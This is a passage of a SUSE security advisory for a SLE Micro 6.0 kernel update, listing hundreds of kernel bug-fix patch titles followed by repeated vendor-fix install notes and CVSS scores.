- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).
- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).
- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).
- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).
- pinctrl: equilibrium: Fix device node reference leak in pinbank_init() (git-fixes).
- pinctrl: meson: mark the GPIO controller as sleeping (git-fixes).
- pinctrl: qcom: lpass-lpi: mark the GPIO controller as sleeping (git-fixes).
- pinctrl: qcom: msm: Fix deadlock in pinmux configuration (stable-fixes).
- pinctrl: qcom: sm8250-lpass-lpi: Fix i2s2_data_groups definition (git-fixes).
- pinctrl: single: Fix PIN_CONFIG_BIAS_DISABLE handling (stable-fixes).
- pinctrl: single: Fix incorrect type for error return variable (git-fixes).
- pinctrl: single: fix refcount leak in pcs_add_gpio_func() (git-fixes).
- pinctrl: stm32: fix hwspinlock resource leak in probe function (git-fixes).
- platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver (git-fixes).
- platform/chrome: cros_ec_lightbar: Fix response size initialization (git-fixes).
- platform/chrome: cros_typec_switch: Do not touch struct fwnode_handle::dev (git-fixes).
- platform/mellanox: mlxbf-pmc: Remove trailing whitespaces from event names (git-fixes).
- platform/x86/amd/pmc: Add quirk for MECHREVO Wujie 15X Pro (stable-fixes).
- platform/x86/amd/pmc: Add spurious_8042 to Xbox Ally (stable-fixes).
- platform/x86/amd: pmc: Add Lenovo Legion Go 2 to pmc quirk list (stable-fixes).
- platform/x86/intel/hid: Add Dell Pro Rugged 10/12 tablet to VGBS DMI quirks (stable-fixes).
- platform/x86: acer-wmi: Ignore backlight event (stable-fixes).
- platform/x86: asus-wmi: use brightness_set_blocking() for kbd led (git-fixes).
- platform/x86: classmate-laptop: Add missing NULL pointer checks (stable-fixes).
- platform/x86: huawei-wmi: add keys for HONOR models (stable-fixes).
- platform/x86: ibm_rtl: fix EBDA signature search pointer arithmetic (git-fixes).
- platform/x86: intel: chtwc_int33fe: do not dereference swnode args (git-fixes).
- platform/x86: intel: punit_ipc: fix memory corruption (git-fixes).
- platform/x86: intel_telemetry: Fix PSS event register mask (git-fixes).
- platform/x86: intel_telemetry: Fix swapped arrays in PSS output (git-fixes).
- platform/x86: msi-laptop: add missing sysfs_remove_group() (git-fixes).
- platform/x86: panasonic-laptop: Fix sysfs group leak in error path (stable-fixes).
- platform/x86: toshiba_haps: Fix memory leaks in add/remove routines (git-fixes).
- power: reset: nvmem-reboot-mode: respect cell size for nvmem_cell_write (git-fixes).
- power: supply: ab8500: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: act8945a: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: apm_power: only unset own apm_get_power_status (git-fixes).
- power: supply: bq256xx: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: bq25980: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: bq27xxx: fix wrong errno when bus ops are unsupported (git-fixes).
- power: supply: cpcap-battery: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: cw2015: Check devm_delayed_work_autocancel() return code (git-fixes).
- power: supply: goldfish: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: qcom_battmgr: Recognize "LiP" as lithium-polymer (git-fixes).
- power: supply: rt9455: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: rt9467: Prevent using uninitialized local variable in rt9467_set_value_from_ranges() (git-fixes).
- power: supply: rt9467: Return error on failure in rt9467_set_value_from_ranges() (git-fixes).
- power: supply: sbs-battery: Fix use-after-free in power_supply_changed() (git-fixes).
- power: supply: wm831x: Check wm831x_set_bits() return value (git-fixes).
- power: supply: wm97xx: Fix NULL pointer dereference in power_supply_changed() (git-fixes).
- powercap: fix race condition in register_control_type() (stable-fixes).
- powercap: fix sscanf() error return value handling (stable-fixes).
- powercap: intel_rapl_tpmi: Remove FW_BUG from invalid version check (git-fixes).
- powerpc/64s/slb: Fix SLB multihit issue during SLB preload (bac#1236022 ltc#211187).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event handling (bsc#1253262 ltc#216029).
- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285 bsc#1205462 bsc#1253739 bsc#1254244).
- pwm: bcm2835: Make sure the channel is enabled after pwm_request() (git-fixes).
- rapidio: replace rio_free_net() with kfree() in rio_scan_alloc_net() (git-fixes).
- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).
- regmap: maple: free entry on mas_store_gfp() failure (stable-fixes).
- regulator: core: Protect regulator_supply_alias_list with regulator_list_mutex (git-fixes).
- regulator: core: disable supply if enabling main regulator fails (git-fixes).
- regulator: core: fix locking in regulator_resolve_supply() error path (git-fixes).
- regulator: core: move supply check earlier in set_machine_constraints() (git-fixes).
- remove a bpf CVE change which is already part of the base kernel
- remove an Intel CPU model change which is already part of the base kernel
- reset: fix BIT macro reference (stable-fixes).
- rpm/mkspec-dtb: add riscv64 dtb-thead subpackage
- rpmsg: core: fix race in driver_override_show() and use core helper (git-fixes).
- rpmsg: glink: fix rpmsg device leak (git-fixes).
- rtc: gamecube: Check the return value of ioremap() (git-fixes).
- rtc: interface: Alarm race handling should not discard preceding error (git-fixes).
- rtc: zynqmp: correct frequency value (stable-fixes).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository
- scripts: obsapi: Support URL trailing / in oscrc
- scripts: teaapi: Add paging
- scripts: uploader: Fix no change condition for _maintainership.json
- scripts: uploader: Handle missing upstream in is_pr_open
- scrits: teaapi: Add list_repos
- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).
- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).
- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).
- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).
- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).
- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).
- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).
- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests/bpf: Skip timer cases when bpf_timer is not supported (git-fixes).
- serial: 8250: 8250_omap.c: Clear DMA RX running status only after DMA termination is done (stable-fixes).
- serial: 8250_dw: handle clock enable errors in runtime_resume (stable-fixes).
- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).
- serial: SH_SCI: improve "DMA support" prompt (git-fixes).
- serial: add support of CPCI cards (stable-fixes).
- serial: amba-pl011: prefer dma_mapping_error() over explicit address checking (git-fixes).
- serial: imx: change SERIAL_IMX_CONSOLE to bool (git-fixes).
- serial: sprd: Return -EPROBE_DEFER when uart clock is not ready (stable-fixes).
- shrink_slab_memcg: clear_bits of skipped shrinkers (bsc#1256564).
- slimbus: core: fix OF node leak on registration failure (git-fixes).
- slimbus: core: fix device reference leak on report present (git-fixes).
- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).
- slimbus: core: fix runtime PM imbalance on report present (git-fixes).
- slimbus: ngd: Fix reference count leak in qcom_slim_ngd_notify_slaves (git-fixes).
- smb3: add missing null server pointer check (git-fixes).
- smb: change return type of cached_dir_lease_break() to bool (git-fixes).
- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).
- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).
- smb: client: fix warning when reconnecting channel (git-fixes).
- smb: client: introduce close_cached_dir_locked() (git-fixes).
- smb: client: remove unused fid_lock (git-fixes).
- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- smc91x: fix broken irq-context in PREEMPT_RT (git-fixes).
- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).
- soc: amlogic: canvas: fix device leak on lookup (git-fixes).
- soc: mediatek: svs: Fix memory leak in svs_enable_debug_write() (git-fixes).
- soc: qcom: cmd-db: Use devm_memremap() to fix memory leak in cmd_db_dev_probe (git-fixes).
- soc: qcom: ocmem: fix device leak on lookup (git-fixes).
- soc: qcom: smem: fix hwspinlock resource leak in probe error paths (git-fixes).
- soc: qcom: smem: handle ENOMEM error during probe (git-fixes).
- soc: ti: k3-socinfo: Fix regmap leak on probe failure (git-fixes).
- soc: ti: pruss: Fix double free in pruss_clk_mux_setup() (git-fixes).
- soundwire: dmi-quirks: add mapping for Avell B.ON (OEM rebranded of NUC15) (stable-fixes).
- spi-geni-qcom: initialize mode related registers to 0 (stable-fixes).
- spi-geni-qcom: use xfer->bits_per_word for can_dma() (stable-fixes).
- spi: amlogic-spifc-a1: Handle devm_pm_runtime_enable() errors (git-fixes).
- spi: bcm63xx: drop wrong casts in probe() (git-fixes).
- spi: bcm63xx: fix premature CS deassertion on RX-only transactions (git-fixes).
- spi: fsl-cpm: Check length parity before switching to 16 bit mode (git-fixes).
- spi: imx: keep dma request disabled before dma transfer setup (stable-fixes).
- spi: spi-mem: Limit octal DTR constraints to octal DTR situations (stable-fixes).
- spi: spi-mem: Protect dirmap_create() with spi_mem_access_start/end (stable-fixes).
- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).
- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).
- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).
- spi: stm32: fix Overrun issue at < 8bpw (stable-fixes).
- spi: tegra114: Preserve SPI mode bits in def_command1_reg (git-fixes).
- spi: tegra210-qspi: Remove cache operations (git-fixes)
- spi: tegra210-quad: Add support for internal DMA (git-fixes)
- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)
- spi: tegra210-quad: Fix timeout handling (bsc#1253155)
- spi: tegra210-quad: Fix timeout handling (git-fixes).
- spi: tegra210-quad: Move curr_xfer read inside spinlock (bsc#1257952)
- spi: tegra210-quad: Move curr_xfer read inside spinlock (git-fixes).
- spi: tegra210-quad: Protect curr_xfer assignment in (bsc#1257952)
- spi: tegra210-quad: Protect curr_xfer assignment in tegra_qspi_setup_transfer_one (git-fixes).
- spi: tegra210-quad: Protect curr_xfer check in IRQ handler (bsc#1257952)
- spi: tegra210-quad: Protect curr_xfer check in IRQ handler (git-fixes).
- spi: tegra210-quad: Protect curr_xfer clearing in (bsc#1257952)
- spi: tegra210-quad: Protect curr_xfer clearing in tegra_qspi_non_combined_seq_xfer (git-fixes).
- spi: tegra210-quad: Protect curr_xfer in tegra_qspi_combined_seq_xfer (bsc#1257952)
- spi: tegra210-quad: Protect curr_xfer in tegra_qspi_combined_seq_xfer (git-fixes).
- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)
- spi: tegra210-quad: Return IRQ_HANDLED when timeout already processed (bsc#1257952)
- spi: tegra210-quad: Return IRQ_HANDLED when timeout already processed transfer (git-fixes).
- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)
- spi: tegra: Fix a memory leak in tegra_slink_probe() (git-fixes).
- spi: wpcm-fiu: Fix potential NULL pointer dereference in wpcm_fiu_probe() (git-fixes).
- spi: wpcm-fiu: Fix uninitialized res (git-fixes).
- spi: wpcm-fiu: Simplify with dev_err_probe() (stable-fixes).
- spi: wpcm-fiu: Use devm_platform_ioremap_resource_byname() (stable-fixes).
- spi: xilinx: increase number of retries before declaring stall (stable-fixes).
- staging: fbtft: core: fix potential memory leak in fbtft_probe_common() (git-fixes).
- staging: rtl8723bs: fix memory leak on failure path (stable-fixes).
- staging: rtl8723bs: fix null dereference in find_network (git-fixes).
- staging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing (stable-fixes).
- staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser (stable-fixes).
- supported.conf: Mark lan 743x supported (jsc#PED-14571)
- thermal: int340x: Fix sysfs group leak on DLVR registration failure (stable-fixes).
- thunderbolt: Add support for Intel Wildcat Lake (stable-fixes).
- tools/power cpupower: Reset errno before strtoull() (stable-fixes).
- tools/power/x86/intel-speed-select: Fix file descriptor leak in isolate_cpus() (git-fixes).
- tpm: st33zp24: Fix missing cleanup on get_burstcount() error (git-fixes).
- tpm: tpm_i2c_infineon: Fix locality leak on get_burstcount() failure (git-fixes).
- tracing: Fix access to trace_event_file (bsc#1254373).
- uacce: ensure safe queue release with state management (git-fixes).
- uacce: fix cdev handling in the cleanup path (git-fixes).
- uacce: fix isolate sysfs check condition (git-fixes).
- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).
- uio: uio_fsl_elbc_gpcm:: Add null pointer check to uio_fsl_elbc_gpcm_probe (git-fixes).
- usb: bdc: fix sleep during atomic (git-fixes).
- usb: cdns3: Fix double resource release in cdns3_pci_probe (git-fixes).
- usb: chaoskey: fix locking for O_NONBLOCK (git-fixes).
- usb: chipidea: udc: limit usb request length to max 16KB (stable-fixes).
- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).
- usb: dwc2: disable platform lowlevel hw resources during shutdown (stable-fixes).
- usb: dwc2: fix hang during shutdown if set as peripheral (git-fixes).
- usb: dwc2: fix hang during suspend if set as peripheral (git-fixes).
- usb: dwc2: fix resume failure if dr_mode is host (git-fixes).
- usb: dwc3: Abort suspend on soft disconnect failure (git-fixes).
- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).
- usb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths (git-fixes).
- usb: dwc3: keep susphy enabled during exit to avoid controller faults (git-fixes).
- usb: dwc3: of-simple: fix clock resource leak in dwc3_of_simple_probe (git-fixes).
- usb: dwc3: pci: Sort out the Intel device IDs (stable-fixes).
- usb: dwc3: pci: add support for the Intel Nova Lake -S (stable-fixes).
- usb: gadget: configfs: Correctly set use_os_string at bind (git-fixes).
- usb: gadget: f_eem: Fix memory leak in eem_unwrap (git-fixes).
- usb: gadget: lpc32xx_udc: fix clock imbalance in error path (git-fixes).
- usb: gadget: renesas_usbf: Handle devm_pm_runtime_enable() errors (git-fixes).
- usb: gadget: tegra-xudc: Add handling for BLCG_COREPLL_PWRDN (git-fixes).
- usb: gadget: tegra-xudc: Always reinitialize data toggle when clear halt (git-fixes).
- usb: ohci-nxp: Use helper function devm_clk_get_enabled() (stable-fixes).
- usb: ohci-nxp: fix device leak on probe failure (git-fixes).
- usb: phy: Initialize struct usb_phy list_head (git-fixes).
- usb: phy: isp1301: fix non-OF device reference imbalance (git-fixes).
- usb: raw-gadget: cap raw_io transfer length to KMALLOC_MAX_SIZE (git-fixes).
- usb: raw-gadget: do not limit transfer length (git-fixes).
- usb: renesas_usbhs: Fix a resource leak in usbhs_pipe_malloc() (git-fixes).
- usb: storage: Fix memory leak in USB bulk transport (git-fixes).
- usb: storage: sddr55: Reject out-of-bound new_pba (stable-fixes).
- usb: typec: tipd: Clear interrupts first (git-fixes).
- usb: typec: ucsi: Handle incorrect num_connectors capability (stable-fixes).
- usb: typec: ucsi: psy: Set max current to zero when disconnected (git-fixes).
- usb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer (git-fixes).
- usb: udc: Add trace event for usb_gadget_set_state (stable-fixes).
- usb: usb-storage: Maintain minimal modifications to the bcdDevice range (git-fixes).
- usb: usb-storage: No additional quirks need to be added to the EL-R12 optical drive (stable-fixes).
- usb: vhci-hcd: Prevent suspending virtually attached devices (git-fixes).
- usb: xhci: limit run_graceperiod for only usb 3.0 devices (stable-fixes).
- usbip: Fix locking bug in RT-enabled kernels (stable-fixes).
- usbnet: limit max_mtu based on device's hard_mtu (git-fixes).
- via_wdt: fix critical boot hang due to unnamed resource allocation (stable-fixes).
- virtio_console: fix order of fields cols and rows (stable-fixes).
- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).
- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).
- watchdog: imx7ulp_wdt: handle the nowayout option (stable-fixes).
- watchdog: wdat_wdt: Fix ACPI table leak in probe function (git-fixes).
- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).
- wifi: ath10k: fix lock protection in ath10k_wmi_event_peer_sta_ps_state_chg() (stable-fixes).
- wifi: ath10k: sdio: add missing lock protection in ath10k_sdio_fw_crashed_dump() (git-fixes).
- wifi: ath11k: add pm quirk for Thinkpad Z13/Z16 Gen1 (stable-fixes).
- wifi: ath11k: fix peer HE MCS assignment (git-fixes).
- wifi: ath11k: restore register window after global reset (git-fixes).
- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).
- wifi: ath12k: fix preferred hardware mode calculation (stable-fixes).
- wifi: ath9k: debug.h: fix kernel-doc bad lines and struct ath_tx_stats (git-fixes).
- wifi: ath9k: fix kernel-doc warnings in common-debug.h (git-fixes).
- wifi: avoid kernel-infoleak from struct iw_point (git-fixes).
- wifi: brcmfmac: Add DMI nvram filename quirk for Acer A1 840 tablet (stable-fixes).
- wifi: cfg80211: Fix bitrate calculation overflow for HE rates (stable-fixes).
- wifi: cfg80211: Fix use_for flag update on BSS refresh (git-fixes).
- wifi: cfg80211: cancel rfkill_block work in wiphy_unregister() (git-fixes).
- wifi: cfg80211: sme: store capped length in __cfg80211_connect_result() (git-fixes).
- wifi: cfg80211: stop NAN and P2P in cfg80211_leave (git-fixes).
- wifi: cfg80211: wext: fix IGTK key ID off-by-one (git-fixes).
- wifi: cw1200: Fix potential memory leak in cw1200_bh_rx_helper() (git-fixes).
- wifi: ieee80211: correct FILS status codes (git-fixes).
- wifi: iwlegacy: add missing mutex protection in il3945_store_measurement() (stable-fixes).
- wifi: iwlegacy: add missing mutex protection in il4965_store_tx_power() (stable-fixes).
- wifi: iwlwifi: mvm: check the validity of noa_len (stable-fixes).
- wifi: libertas: fix WARNING in usb_tx_block (stable-fixes).
- wifi: mac80211: bounds-check link_id in ieee80211_ml_reconfiguration (git-fixes).
- wifi: mac80211: collect station statistics earlier when disconnect (stable-fixes).
- wifi: mac80211: correctly check if CSA is active (stable-fixes).
- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).
- wifi: mac80211: do not increment crypto_tx_tailroom_needed_cnt twice (stable-fixes).
- wifi: mac80211: do not use old MBSSID elements (git-fixes).
- wifi: mac80211: fix CMAC functions not handling errors (git-fixes).
- wifi: mac80211: fix NULL pointer dereference in mesh_rx_csa_frame() (git-fixes).
- wifi: mac80211: ocb: skip rx_no_sta when interface is not joined (stable-fixes).
- wifi: mac80211: restore non-chanctx injection behaviour (git-fixes).
- wifi: mt76: Fix DTS power-limits on little endian systems (git-fixes).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- wifi: nl80211: vendor-cmd: intel: fix a blank kernel-doc line warning (git-fixes).
- wifi: radiotap: reject radiotap with unknown bits (git-fixes).
- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).
- wifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring() (git-fixes).
- wifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb() (git-fixes).
- wifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add (git-fixes).
- wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc() (git-fixes).
- wifi: rtw88: 8822b: Avoid WARNING in rtw8822b_config_trx_mode() (stable-fixes).
- wifi: rtw88: Add USB ID 2001:3329 for D-Link AC13U rev. A1 (stable-fixes).
- wifi: rtw88: Fix alignment fault in rtw_core_enable_beacon() (git-fixes).
- wifi: rtw88: fix DTIM period handling when conf->dtim_period is zero (stable-fixes).
- wifi: rtw88: limit indirect IO under powered off for RTL8822CS (git-fixes).
- wifi: rtw88: rtw8821cu: Add ID for Mercusys MU6H (stable-fixes).
- wifi: rtw89: pci: restore LDO setting after device resume (stable-fixes).
- wifi: rtw89: wow: add reason codes for disassociation in WoWLAN mode (stable-fixes).
- wifi: wlcore: ensure skb headroom before skb_push (stable-fixes).
- workqueue: mark power efficient workqueue as unbounded if (bsc#1257891)
- x86/hyperv: Fix APIC ID and VP index confusion in hv_snp_boot_ap() (git-fixes).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
- x86: make page fault handling disable interrupts properly (git-fixes).
- xhci: dbgtty: fix device unregister (git-fixes).
Patchnames: SUSE-SLE-Micro-6.0-kernel-295
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
